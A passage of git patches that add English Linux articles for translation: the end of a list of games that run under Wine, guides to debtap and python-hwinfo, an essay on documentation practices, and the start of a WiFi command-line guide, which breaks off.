+
+![World of Warcraft Wine][1]
+
+The venerable king of MMORPGs is still alive and going strong. Even though it might not be the most graphically advanced game, it still takes some power to crank all the settings up to max. World of Warcraft has actually worked under Wine for years. Until this latest expansion, WoW supported OpenGL for its Mac version, making it very easy to get working under Linux. That's not quite the case anymore.
+
+You'll need to run WoW with DX9 and will definitely see some benefit from the [Gallium Nine][2] patches, but you can confidently make the switch over to Linux without missing raid night.
+
+### 9. Skyrim
+
+![Skyrim Wine][3]
+
+Skyrim's not exactly new, but it's still fueled by a thriving modding community. You can now easily enjoy Skyrim and its many, many mods if you have a Linux system with enough resources to handle it all. Remember that Wine uses more system power than running the game natively, so account for that in your mod usage.
+
+### 8. StarCraft II
+
+![StarCraft II Wine][4]
+
+StarCraft II is easily one of the most popular RTS games on the market and works very well under Wine. It is actually one of the best performing games under Wine. That means that you can play your favorite RTS on Linux with minimal hassle and near-native performance.
+
+Given the competitive nature of this game, you obviously need the game to run well. Have no fear there. You should have no problem playing competitively with adequate hardware.
+
+This is an instance where you'll benefit from the "staging" patches, so continue using them when you're getting the game set up.
+
+### 7. Fallout 3/New Vegas
+
+![Fallout 3 Wine][5]
+
+Before you ask, Fallout 4 is on the verge of working. At the time you're reading this, it might. For now, though, Fallout 3 and New Vegas both work great, both with and without mods. These games run very well under Wine and can even handle loads of mods to keep them fresh and interesting. It doesn't seem like a bad compromise to hold you over until Fallout 4 support matures.
+
+### 6. Doom (2016)
+
+![Doom Wine][6]
+
+Doom is one of the most exciting shooters of the past few years, and it run very well under Wine with the latest versions and the "staging" patches. Both single player and multiplayer work great, and you don't need to spend loads of time configuring Wine and tweaking settings. Doom just works. So, if you're looking for a brutal AAA shooter on Linux, consider giving Doom a try.
+
+### 5. Guild Wars 2
+
+![Guild Wars 2 Wine][7]
+
+Guild War 2 is a sort-of hybrid MMO/dungeon crawler without a monthly fee. It's very popular and boasts some really innovative features for the genre. It also runs smoothly on Linux with Wine.
+
+Guild Wars 2 isn't some ancient MMO either. It's tried to keep itself modern graphically and has fairly high resolution textures and visual effects for the genre. All of it looks and works very well under Wine.
+
+### 4. League Of Legends
+
+![League Of Legends Wine][8]
+
+There are two top players in the MOBA world: DoTA2 and League of Legends. Valve ported DoTA2 to Linux some time ago, but League of Legends has never been made available to Linux gamers. If you're a Linux user and a fan of League, you can still play your favorite MOBA through Wine.
+
+League of Legends is an interesting case. The game itself runs fine, but the installer breaks because it requires Adobe Air. There are some installer scripts available from Lutris and PlayOnLinux that get you through the process. Once it's installed, you should have no problem running League and even playing it smoothly in competitive situations.
+
+### 3. Hearthstone
+
+![HearthStone Wine][9]
+
+Hearthstone is a popular and addictive free-to-play digital card game that's available on a variety of platforms … except Linux. Don't worry, it works very well in Wine. Hearthstone is such a lightweight game that it's actually playable through Wine on even the lowest powered systems. That's good news, too, but because Hearthstone is another competitive game where performance matters.
+
+Hearthstone doesn't require any special configuration or even patches. It just works.
+
+### 2. Witcher 3
+
+![Witcher 3 Wine][10]
+
+If you're surprised to see this one here, you're not alone. With the latest "staging" patches, The Witcher 3 finally works. Despite originally being promised a native release, Linux gamers have had to wait a good long while to get the third installment in the Witcher franchise.
+
+Don't expect everything to be perfect just yet. Support for Witcher 3 is _very_ new, and some things might not work as expected. That said, if you only have Linux to game on, and you 're willing to deal with a couple of rough edges, you can enjoy this awesome game for the first time with few, if any, troubles.
+
+### 1. Overwatch
+
+![Overwatch Wine][11]
+
+Finally, there's yet another "white whale" for Linux gamers. Overwatch has been an elusive target that many feel should have been working on Wine since day one. Most Blizzard games have. Overwatch was a very different case. It only ever supported DX11, and that was a serious pain point for Wine.
+
+Overwatch doesn't have the best performance yet, but you can definitely still play Blizzard's wildly popular shooter using a specially-patched version of Wine with the "staging" patches and additional ones just for Overwatch. That means Linux gamers wanted Overwatch so bad that they developed a special set of patches for it.
+
+There were certainly games left off of this list. Most were just due to popularity or only conditional support under Wine. Other Blizzard games, like Heroes of the Storm and Diablo III also work, but this list would have been even more dominated by Blizzard, and that's not the point.
+
+If you're going to try playing any of these games, consider using the "staging" or [Gallium Nine versions][2] of Wine. Many of the games here won't work without them. Even still, the latest patches and improvements land in "staging" long before they make it into the mainstream Wine release. Using it will keep you on the leading edge of progress.
+
+Speaking of progress, right now Wine is making massive strides in DirectX11 support. While that doesn't mean much to Windows gamers, it's a huge deal for Linux. Most new games support DX11 and DX12, and until recently Wine only supported DX9. With DX11 support, Wine is gaining support for loads of games that were previously unplayable. So keep checking regularly to see if your favorite games from Windows started working in Wine. You might be very pleasantly surprised.
+
+--------------------------------------------------------------------------------
+
+via: https://www.maketecheasier.com/games-play-on-linux-with-wine/
+
+作者:[Nick Congleton][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.maketecheasier.com/author/nickcongleton/
+[1]:https://www.maketecheasier.com/assets/uploads/2017/09/wow.jpg (World of Warcraft Wine)
+[2]:https://www.maketecheasier.com/install-wine-gallium-nine-linux
+[3]:https://www.maketecheasier.com/assets/uploads/2017/09/skyrim.jpg (Skyrim Wine)
+[4]:https://www.maketecheasier.com/assets/uploads/2017/09/sc2.jpg (StarCraft II Wine)
+[5]:https://www.maketecheasier.com/assets/uploads/2017/09/Fallout_3.jpg (Fallout 3 Wine)
+[6]:https://www.maketecheasier.com/assets/uploads/2017/09/doom.jpg (Doom Wine)
+[7]:https://www.maketecheasier.com/assets/uploads/2017/09/gw2.jpg (Guild Wars 2 Wine)
+[8]:https://www.maketecheasier.com/assets/uploads/2017/09/League_of_legends.jpg (League Of Legends Wine)
+[9]:https://www.maketecheasier.com/assets/uploads/2017/09/HearthStone.jpg (HearthStone Wine)
+[10]:https://www.maketecheasier.com/assets/uploads/2017/09/witcher3.jpg (Witcher 3 Wine)
+[11]:https://www.maketecheasier.com/assets/uploads/2017/09/Overwatch.jpg (Overwatch Wine)
From 1bf6595a19312aa4b8857bd445dcec7c6ff5e036 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:25:31 +0800
Subject: [PATCH 080/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Conver?=
=?UTF-8?q?t=20DEB=20Packages=20Into=20Arch=20Linux=20Packages?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...t DEB Packages Into Arch Linux Packages.md | 169 ++++++++++++++++++
1 file changed, 169 insertions(+)
create mode 100644 sources/tech/20171006 How To Convert DEB Packages Into Arch Linux Packages.md
diff --git a/sources/tech/20171006 How To Convert DEB Packages Into Arch Linux Packages.md b/sources/tech/20171006 How To Convert DEB Packages Into Arch Linux Packages.md
new file mode 100644
index 0000000000..6287fad11f
--- /dev/null
+++ b/sources/tech/20171006 How To Convert DEB Packages Into Arch Linux Packages.md
@@ -0,0 +1,169 @@
+How To Convert DEB Packages Into Arch Linux Packages
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/10/Debtap-720x340.png)
+
+We already learned how to [**build packages for multiple platforms**][1], and how to **[build packages from source][2]**. Today, we are going to learn how to convert DEB packages into Arch Linux packages. You might ask, **AUR** is the large software repository on the planet, and almost all software are available in it. Why would I need to convert a DEB package into Arch Linux package? True! However, some packages cannot be compiled (closed source packages) or cannot be built from AUR for various reasons like error during compiling or unavailable files. Or, the developer is too lazy to build a package in AUR or s/he doesn 't like to create an AUR package. In such cases, we can use this quick and dirty method to convert DEB packages into Arch Linux packages.
+
+### Debtap - Convert DEB Packages Into Arch Linux Packages
+
+For this purpose, we are going to use an utility called **" Debtap"**. It stands **DEB** **T** o **A** rch (Linux) **P** ackage. Debtap is available in AUR, so you can install it using the AUR helper tools such as [**Pacaur**][3], [**Packer**][4], or [**Yaourt**][5].
+
+To unstall debtap using pacaur, run:
+```
+pacaur -S debtap
+```
+
+Using Packer:
+```
+packer -S debtap
+```
+
+Using Yaourt:
+```
+yaourt -S debtap
+```
+
+Also, your Arch system should have **bash,** **binutils** , **pkgfile** and **fakeroot ** packages installed.
+
+After installing Debtap and all above mentioned dependencies, run the following command to create/update pkgfile and debtap database.
+```
+sudo debtap -u
+```
+
+Sample output would be:
+```
+==> Synchronizing pkgfile database...
+:: Updating 6 repos...
+ download complete: archlinuxfr [ 151.7 KiB 67.5K/s 5 remaining]
+ download complete: multilib [ 319.5 KiB 36.2K/s 4 remaining]
+ download complete: core [ 707.7 KiB 49.5K/s 3 remaining]
+ download complete: testing [ 1716.3 KiB 58.2K/s 2 remaining]
+ download complete: extra [ 7.4 MiB 109K/s 1 remaining]
+ download complete: community [ 16.9 MiB 131K/s 0 remaining]
+:: download complete in 131.47s < 27.1 MiB 211K/s 6 files >
+:: waiting for 1 process to finish repacking repos...
+==> Synchronizing debtap database...
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 34.1M 100 34.1M 0 0 206k 0 0:02:49 0:02:49 --:--:-- 180k
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 814k 100 814k 0 0 101k 0 0:00:08 0:00:08 --:--:-- 113k
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 120k 100 120k 0 0 61575 0 0:00:02 0:00:02 --:--:-- 52381
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 35.4M 100 35.4M 0 0 175k 0 0:03:27 0:03:27 --:--:-- 257k
+==> Downloading latest virtual packages list...
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 149 0 149 0 0 49 0 --:--:-- 0:00:03 --:--:-- 44
+100 11890 0 11890 0 0 2378 0 --:--:-- 0:00:05 --:--:-- 8456
+==> Downloading latest AUR packages list...
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+100 264k 0 264k 0 0 30128 0 --:--:-- 0:00:09 --:--:-- 74410
+==> Generating base group packages list...
+==> All steps successfully completed!
+```
+
+You must run the above command at least once.
+
+Now, it's time for package conversion.
+
+To convert any DEB package, say **Quadrapassel** , to Arch Linux package using debtap, do:
+```
+debtap quadrapassel_3.22.0-1.1_arm64.deb
+```
+
+The above command will convert the given .deb file into a Arch Linux package. You will be asked to enter the name of the package maintainer and license. Just enter them and hit ENTER key to start the conversion process.
+
+The package conversion will take from a few seconds to several minutes depending upon your CPU speed. Grab a cup of coffee.
+
+Sample output would be:
+```
+==> Extracting package data...
+==> Fixing possible directories structure differencies...
+==> Generating .PKGINFO file...
+
+:: Enter Packager name:
+**quadrapassel**
+
+:: Enter package license (you can enter multiple licenses comma separated):
+**GPL**
+
+*** Creation of .PKGINFO file in progress. It may take a few minutes, please wait...
+
+Warning: These dependencies (depend = fields) could not be translated into Arch Linux packages names:
+gsettings-backend
+
+== > Checking and generating .INSTALL file (if necessary)...
+
+:: If you want to edit .PKGINFO and .INSTALL files (in this order), press (1) For vi (2) For nano (3) For default editor (4) For a custom editor or any other key to continue:
+
+==> Generating .MTREE file...
+
+==> Creating final package...
+==> Package successfully created!
+==> Removing leftover files...
+```
+
+**Note:** Quadrapassel package is already available in the Arch Linux official repositories. I used it just for demonstration purpose.
+
+If you don't want to answer any questions during package conversion, use **-q** flag to bypass all questions, except for editing metadata file(s).
+```
+debtap -q quadrapassel_3.22.0-1.1_arm64.deb
+```
+
+To bypass all questions (not recommended though), use -Q flag.
+```
+debtap -Q quadrapassel_3.22.0-1.1_arm64.deb
+```
+
+Once the conversion is done, you can install the newly converted package using "pacman" in your Arch system as shown below.
+```
+sudo pacman -U
+```
+
+To display the help section, use **-h** flag:
+```
+$ debtap -h
+Syntax: debtap [options] package_filename
+
+Options:
+
+ -h --h -help --help Prints this help message
+ -u --u -update --update Update debtap database
+ -q --q -quiet --quiet Bypass all questions, except for editing metadata file(s)
+ -Q --Q -Quiet --Quiet Bypass all questions (not recommended)
+ -s --s -pseudo --pseudo Create a pseudo-64-bit package from a 32-bit .deb package
+ -w --w -wipeout --wipeout Wipeout versions from all dependencies, conflicts etc.
+ -p --p -pkgbuild --pkgbuild Additionally generate a PKGBUILD file
+ -P --P -Pkgbuild --Pkgbuild Generate a PKGBUILD file only
+```
+
+And, that's all for now folks. Hope this utility helps. If you find our guides useful, please spend a moment to share them on your social, professional networks and support OSTechNix!
+
+More good stuffs to come. Stay tuned!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/convert-deb-packages-arch-linux-packages/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://www.ostechnix.com/build-linux-packages-multiple-platforms-easily/
+[2]:https://www.ostechnix.com/build-packages-source-using-checkinstall/
+[3]:https://www.ostechnix.com/install-pacaur-arch-linux/
+[4]:https://www.ostechnix.com/install-packer-arch-linux-2/
+[5]:https://www.ostechnix.com/install-yaourt-arch-linux/
From 7c8236409ee82c347232b1f28bc4dea67e374477 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:27:48 +0800
Subject: [PATCH 081/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20python-hwinfo=20:?=
=?UTF-8?q?=20Display=20Summary=20Of=20Hardware=20Information=20In=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ummary Of Hardware Information In Linux.md | 176 ++++++++++++++++++
1 file changed, 176 insertions(+)
create mode 100644 sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
diff --git a/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md b/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
new file mode 100644
index 0000000000..f92c52f3cf
--- /dev/null
+++ b/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
@@ -0,0 +1,176 @@
+python-hwinfo : Display Summary Of Hardware Information In Linux
+======
+Till the date, we have covered most of the utilities which discover Linux system hardware information & configuration but still there are plenty of commands available for the same purpose.
+
+In that, some of the utilities are display detailed information about all the hardware components and reset will shows only specific device information.
+
+In this series, today we are going to discuss about [python-hwinfo][1], it is one of the tool that display summary of hardware information and it's configuration in the neat way.
+
+### What's python-hwinfo
+
+This is a python library for inspecting hardware and devices by parsing the outputs of system utilities such as lspci and dmidecode.
+
+It's offering a simple CLI toll which can be used for inspect local, remote and captured hosts. Run the command with sudo to get maximum information.
+
+Additionally you can execute this on remote server by providing a Server IP or Host name, username, and password. Also you can use this tool to view other utilities captured outputs like demidecode as 'dmidecode.out', /proc/cpuinfo as 'cpuinfo', lspci -nnm as 'lspci-nnm.out', etc,.
+
+**Suggested Read :**
+**(#)** [inxi - A Great Tool to Check Hardware Information on Linux][2]
+**(#)** [Dmidecode - Easy Way To Get Linux System Hardware Information][3]
+**(#)** [LSHW (Hardware Lister) - A Nifty Tool To Get A Hardware Information On Linux][4]
+**(#)** [hwinfo (Hardware Info) - A Nifty Tool To Detect System Hardware Information On Linux][5]
+**(#)** [How To Use lspci, lsscsi, lsusb, And lsblk To Get Linux System Devices Information][6]
+
+### How to Install python-hwinfo in Linux
+
+It can be installed through pip package to all major Linux distributions. In order to install python-hwinfo, Make sure your system have python and python-pip packages as a prerequisites.
+
+pip is a python module bundled with setuptools, it's one of the recommended tool for installing Python packages in Linux.
+
+For **`Debian/Ubuntu`** , use [APT-GET Command][7] or [APT Command][8] to install pip.
+```
+$ sudo apt install python-pip
+
+```
+
+For **`RHEL/CentOS`** , use [YUM Command][9] to install pip.
+```
+$ sudo yum install python-pip python-devel
+
+```
+
+For **`Fedora`** , use [DNF Command][10] to install pip.
+```
+$ sudo dnf install python-pip
+
+```
+
+For **`Arch Linux`** , use [Pacman Command][11] to install pip.
+```
+$ sudo pacman -S python-pip
+
+```
+
+For **`openSUSE`** , use [Zypper Command][12] to install pip.
+```
+$ sudo zypper python-pip
+
+```
+
+Finally, Run the following pip command to install python-hwinfo.
+```
+$ sudo pip install python-hwinfo
+
+```
+
+### How to Use python-hwinfo in local machine
+
+Execute the following command to inspect the hardware present on a local machine. The output is much clear and neat which i didn't see in any other commands.
+
+It's categorized the output in five classes.
+
+ * **`Bios Info:`** It 's contains bios_vendor_name, system_product_name, system_serial_number, system_uuid, system_manufacturer, bios_release_date, and bios_version
+ * **`CPU Info:`** It 's display no of processor, vendor_id, cpu_family, model, stepping, model_name, and cpu_mhz
+ * **`Ethernet Controller Info:`** It 's shows device_bus_id, vendor_name, vendor_id, device_name, device_id, subvendor_name, subvendor_id, subdevice_name, and subdevice_id
+ * **`Storage Controller Info:`** It 's shows vendor_name, vendor_id, device_name, device_id, subvendor_name, subvendor_id, subdevice_name, and subdevice_id
+ * **`GPU Info:`** It 's shows vendor_name, vendor_id, device_name, device_id, subvendor_name, subvendor_id, subdevice_name, and subdevice_id
+
+
+```
+$ sudo hwinfo
+
+Bios Info:
+
++----------------------|--------------------------------------+
+| Key | Value |
++----------------------|--------------------------------------+
+| bios_vendor_name | IBM |
+| system_product_name | System x3550 M3: -[6102AF1]- |
+| system_serial_number | RS2IY21 |
+| chassis_type | Rack Mount Chassis |
+| system_uuid | 4C4C4544-0051-3210-8052-B2C04F323132 |
+| system_manufacturer | IBM |
+| socket_count | 2 |
+| bios_release_date | 10/21/2014 |
+| bios_version | -[VLS211TSU-2.51]- |
+| socket_designation | Socket 1, Socket 2 |
++----------------------|--------------------------------------+
+
+CPU Info:
+
++-----------|--------------|------------|-------|----------|------------------------------------------|----------+
+| processor | vendor_id | cpu_family | model | stepping | model_name | cpu_mhz |
++-----------|--------------|------------|-------|----------|------------------------------------------|----------+
+| 0 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 1 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 2 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 3 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 4 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-2650 0 @ 2.00GHz | 1200.000 |
++-----------|--------------|------------|-------|----------|------------------------------------------|----------+
+
+Ethernet Controller Info:
+
++-------------------|-----------|---------------------------------|-----------|-------------------|--------------|---------------------------------|--------------+
+| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
++-------------------|-----------|---------------------------------|-----------|-------------------|--------------|---------------------------------|--------------+
+| Intel Corporation | 8086 | I350 Gigabit Network Connection | 1521 | Intel Corporation | 8086 | I350 Gigabit Network Connection | 1521 |
++-------------------|-----------|---------------------------------|-----------|-------------------|--------------|---------------------------------|--------------+
+
+Storage Controller Info:
+
++-------------------|-----------|----------------------------------------------|-----------|----------------|--------------|----------------|--------------+
+| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
++-------------------|-----------|----------------------------------------------|-----------|----------------|--------------|----------------|--------------+
+| Intel Corporation | 8086 | C600/X79 series chipset IDE-r Controller | 1d3c | Dell | 1028 | [Device 05d2] | 05d2 |
+| Intel Corporation | 8086 | C600/X79 series chipset SATA RAID Controller | 2826 | Dell | 1028 | [Device 05d2] | 05d2 |
++-------------------|-----------|----------------------------------------------|-----------|----------------|--------------|----------------|--------------+
+
+GPU Info:
+
++--------------------|-----------|-----------------------|-----------|--------------------|--------------|----------------|--------------+
+| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
++--------------------|-----------|-----------------------|-----------|--------------------|--------------|----------------|--------------+
+| NVIDIA Corporation | 10de | GK107GL [Quadro K600] | 0ffa | NVIDIA Corporation | 10de | [Device 094b] | 094b |
++--------------------|-----------|-----------------------|-----------|--------------------|--------------|----------------|--------------+
+
+```
+
+### How to Use python-hwinfo in remote machine
+
+Execute the following command to inspect the hardware present on a remote machine which required remote server IP, username, and password.
+```
+$ hwinfo -m x.x.x.x -u root -p password
+
+```
+
+### How to Use python-hwinfo to read captured outputs
+
+Execute the following command to inspect the hardware present on a local machine. The output is much clear and neat which i didn't see in any other commands.
+```
+$ hwinfo -f [Path to file]
+
+```
+
+--------------------------------------------------------------------------------
+
+via: https://www.2daygeek.com/python-hwinfo-check-display-system-hardware-configuration-information-linux/
+
+作者:[2DAYGEEK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.2daygeek.com/author/2daygeek/
+[1]:https://github.com/rdobson/python-hwinfo
+[2]:https://www.2daygeek.com/inxi-system-hardware-information-on-linux/
+[3]:https://www.2daygeek.com/dmidecode-get-print-display-check-linux-system-hardware-information/
+[4]:https://www.2daygeek.com/lshw-find-check-system-hardware-information-details-linux/
+[5]:https://www.2daygeek.com/hwinfo-check-display-detect-system-hardware-information-linux/
+[6]:https://www.2daygeek.com/check-system-hardware-devices-bus-information-lspci-lsscsi-lsusb-lsblk-linux/
+[7]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/
+[8]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/
+[9]:https://www.2daygeek.com/yum-command-examples-manage-packages-rhel-centos-systems/
+[10]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/
+[11]:https://www.2daygeek.com/pacman-command-examples-manage-packages-arch-linux-system/
+[12]:https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/
From 131abb1fb5bf911f110fb679ca390e2ff30ea5ae Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:31:27 +0800
Subject: [PATCH 082/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=207=20deadly=20sins?=
=?UTF-8?q?=20of=20documentation?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...20171006 7 deadly sins of documentation.md | 85 +++++++++++++++++++
1 file changed, 85 insertions(+)
create mode 100644 sources/tech/20171006 7 deadly sins of documentation.md
diff --git a/sources/tech/20171006 7 deadly sins of documentation.md b/sources/tech/20171006 7 deadly sins of documentation.md
new file mode 100644
index 0000000000..5f2005c764
--- /dev/null
+++ b/sources/tech/20171006 7 deadly sins of documentation.md
@@ -0,0 +1,85 @@
+7 deadly sins of documentation
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/osdc-lead-cat-writing-king-typewriter-doc.png?itok=afaEoOqc)
+Documentation seems to be a perennial problem in operations. Everyone agrees that it's important to have, but few believe that their organizations have all the documentation they need. Effective documentation practices can improve incident response, speed up onboarding, and help reduce technical debt--but poor documentation practices can be worse than having no documentation at all.
+
+### The 7 sins
+
+Do any of the following scenarios sound familiar?
+
+ * You've got a wiki. And a Google Doc repository. And GitHub docs. And a bunch of text files in your home directory. And notes about problems in email.
+ * You have a doc that explains everything about a service, and you're sure that the information you need to fix this incident in there ... somewhere.
+ * You've got a 500-line Puppet manifest to handle this service ... with no comments. Or comments that reference tickets from two ticketing systems ago.
+ * You have a bunch of archived presentations that discuss all sorts of infrastructure components, but you're not sure how up-to-date they are because you haven't had time to watch them in ages.
+ * You bring someone new into the team and they spend a month asking what various pieces of jargon mean.
+ * You search your wiki and find three separate docs on how this service works, two of which contradict each other entirely, and none of which have been updated in the past year.
+
+
+
+These are all signs you may have committed at least one of the deadly sins of documentation:
+
+1\. Repository overload.
+2\. Burying the lede.
+3\. Comment neglect.
+4\. Video addiction.
+5\. Jargon overuse.
+6\. Documentation overgrowth.
+
+But if you've committed any of those sins, chances are you know this one, too:
+
+7\. One or more of the above is true, but everyone says they don't have time to work on documentation.
+
+The worst sin of all is thinking that documentation is "extra" work. Those other problems are almost always a result of this mistake. Documentation isn't extra work--it's a necessary part of every project, and if it isn't treated that way, it will be nearly impossible to do well. You wouldn't expect to get good code out of developers without a coherent process for writing, reviewing, and publishing code, and yet we often treat documentation like an afterthought, something that we assume will happen while we get our other work done. If you think your documentation is inadequate, ask yourself these questions:
+
+ * Do your projects include producing documentation as a measurable goal?
+ * Do you have a formal review process for documentation?
+ * Is documentation considered a task for senior members of the team?
+
+
+
+The worst sin of all is thinking that documentation is "extra" work.
+
+Those three questions can tell you a lot about whether you treat documentation as extra work or not. If people aren't given the time to write documentation, if there's no process to make sure the documentation that's produced is actually useful, or if documentation is foisted on those members of your team with the weakest grasp on the subjects being covered, it will be difficult to produce anything of decent quality.
+
+Those three questions can tell you a lot about whether you treat documentation as extra work or not. If people aren't given the time to write documentation, if there's no process to make sure the documentation that's produced is actually useful, or if documentation is foisted on those members of your team with the weakest grasp on the subjects being covered, it will be difficult to produce anything of decent quality.
+
+This often-dismissive attitude is pervasive in the industry. According to the [GitHub 2017 Open Source Survey][1], the number-one problem with most open source projects is incomplete or confusing documentation. But how many of those projects solicit technical writers to help improve that? How many of us in operations have a technical writer we bring in to help write or improve our documentation?
+
+### Practice makes (closer to) perfect
+
+This isn't to say that only a technical writer can produce good documentation, but writing and editing are skills like any other: We'll only get better at it if we work at it, and too few of us do. What are the concrete steps we can take to make it a real priority, as opposed to a nice-to-have?
+
+For a start, make good documentation a value that your organization champions. Just as reliability needs champions to get prioritized, documentation needs the same thing. Project plans and sprints should include delivering new documentation or updating old documentation, and allocate time for doing so. Make sure people understand that writing good documentation is just as important to their career development as writing good code.
+
+Additionally, make it easy to keep documentation up to date and for people to find the documentation they need. In this way, you can help perpetuate the virtuous circle of documentation: High-quality docs help people realize the value of documentation and provide examples to follow when they write their own, which in turn will encourage them to create their own.
+
+To do this, have as few repositories as possible; one or two is optimal (you might want your runbooks to be in Google Docs so they are accessible if the company wiki is down, for instance). If you have more, make sure everyone knows what each repository is for; if Google Docs is for runbooks, verify that all runbooks are there and nowhere else, and that everyone knows that. Ensure that your repositories are searchable and keep a change history, and to improve discoverability, consider adding portals that have frequently used or especially important docs surfaced for easy access. Do not depend on email, chat logs, or tickets as primary sources of documentation.
+
+Ask new and junior members of your team to review both your code and your documentation. If they don't understand what's going on in your code, or why you made the choices you did, it probably needs to be rewritten and/or commented better. If your docs aren't easy to understand without going down a rabbit hole, they probably need to be revised. Technical documentation should include concrete examples of how processes and behaviors work to help people create mental models. You may find the tips in this article helpful for improving your documentation writing: [10 tips for making your documentation crystal clear][2].
+
+When you're writing those docs, especially when it comes to runbooks, use the [inverted pyramid format][3]: The most commonly needed or most important information should be as close to the top of the page as possible. Don't combine runbook-style documents and longer-form technical reference; instead, link the two and keep them separate so that runbooks remain streamlined (but can easily be discovered from the reference, and vice versa).
+
+Using these steps in your documentation can change it from being a nice-to-have (or worse, a burden) into a force multiplier for your operations team. Good docs improve inclusiveness and knowledge transfer, helping your more inexperienced team members solve problems independently, freeing your more senior team members to work on new projects instead of firefighting or training new people. Better yet, well-written, high-quality documentation enables you and your team members to enjoy a weekend off or go on vacation without being on the hook if problems come up.
+
+Learn more in Chastity Blackwell's talk, [The 7 Deadly Sins of Documentation][4], at [LISA17][5], which will be held October 29-November 3 in San Francisco, California.
+
+### About The Author
+
+Chastity Blackwell;Chastity Blackwell Is A Site Reliability Engineer At Yelp;With More Than Years Of Experience In Operations.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/10/7-deadly-sins-documentation
+
+作者:[Chastity Blackwell][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/cblkwell
+[1]:http://opensourcesurvey.org/2017/
+[2]:https://opensource.com/life/16/11/tips-for-clear-documentation
+[3]:https://en.wikipedia.org/wiki/Inverted_pyramid_(journalism)
+[4]:https://www.usenix.org/conference/lisa17/conference-program/presentation/blackwell
+[5]:https://www.usenix.org/conference/lisa17
From a919046f9118a1d2e4f5043f3f286abf82708234 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:33:07 +0800
Subject: [PATCH 083/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Connect=20To=20Wi?=
=?UTF-8?q?fi=20From=20The=20Linux=20Command=20Line?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ect To Wifi From The Linux Command Line.md | 119 ++++++++++++++++++
1 file changed, 119 insertions(+)
create mode 100644 sources/tech/20171002 Connect To Wifi From The Linux Command Line.md
diff --git a/sources/tech/20171002 Connect To Wifi From The Linux Command Line.md b/sources/tech/20171002 Connect To Wifi From The Linux Command Line.md
new file mode 100644
index 0000000000..de47cf50a8
--- /dev/null
+++ b/sources/tech/20171002 Connect To Wifi From The Linux Command Line.md
@@ -0,0 +1,119 @@
+translating by lujun9972
+Connect To Wifi From The Linux Command Line
+======
+
+### Objective
+
+Configure WiFi using only command line utilities.
+
+### Distributions
+
+This will work on any major Linux distribution.
+
+### Requirements
+
+A working Linux install with root privileges and a compatible wireless network adapter.
+
+### Difficulty
+
+Easy
+
+### Conventions
+
